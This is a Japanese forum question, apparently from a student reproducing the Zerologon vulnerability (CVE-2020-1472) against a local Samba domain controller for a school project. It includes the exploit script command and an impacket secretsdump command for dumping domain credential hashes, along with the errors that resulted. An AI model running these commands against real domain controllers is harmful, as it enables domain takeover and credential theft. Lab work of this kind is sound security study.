2

ローカル環境でCVE-2020-1472 (Zerologon)をエミュレートする必要がある学校のプロジェクトがあります。現在、次のgithub スクリプトをテストしようとしていますが、それ以来解決できなかった問題に直面しています。

要約すると、次のものがあります。

  • Samba 4.3.8 ドメイン コントローラ Active Directoryを備えたUbuntu 16.04マシン
  • Sambaで作成したドメインEXAMPLE.COMに参加したWindows Server 2019 。

いくつかのテストを行ったところ、 POCの最初の部分で「管理者」アカウントのパスワードを正常に変更できました。 ./cve-2020-1472-exploit.py -n EXAMPLE-DC -t 1.2.3.4

ドメインからいくつかのデータを抽出するためにimpacketを実行しようとすると、問題が発生します。

secretsdump.py -no-pass -just-dc Domain/'DC_NETBIOS_NAME$'@DC_IP_ADDR

正常にログインしますが、次のメッセージが表示されます。

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] DRSR SessionError: code: 0x20e4 - ERROR_DS_CANT_FIND_EXPECTED_NC - The naming context could not be found.
[*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...

更新 1:オプション も使用しようとしまし-use-vssたが、ログイン後にも失敗します。

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Searching for NTDS.dit
[-] 'NoneType' object has no attribute 'request'
[*] Cleaning up...

に関する情報を取得しようとしましたDRSR SessionError: code: 0x20e4 - ERROR_DS_CANT_FIND_EXPECTED_NCが、インターネット上で有用な情報が見つかりませんでした.誰かがすでにこのエラーに直面しているか、Active Directory に関する知識を持っていることを願っています。

前もって感謝し、良い週を!

更新 2:

impacket の githubに投稿 しましたが、DRSUAPI アプローチは Windows 以外の AD に対してテストされていないようです。したがって、secretsdump は機能しません。

すべてのページでSAMBAが脆弱であると言及されているため、実際に脆弱性を悪用するためにテストしたのか、それとも単なる理論上の仮定だったのか疑問に思います。

4

0 に答える 0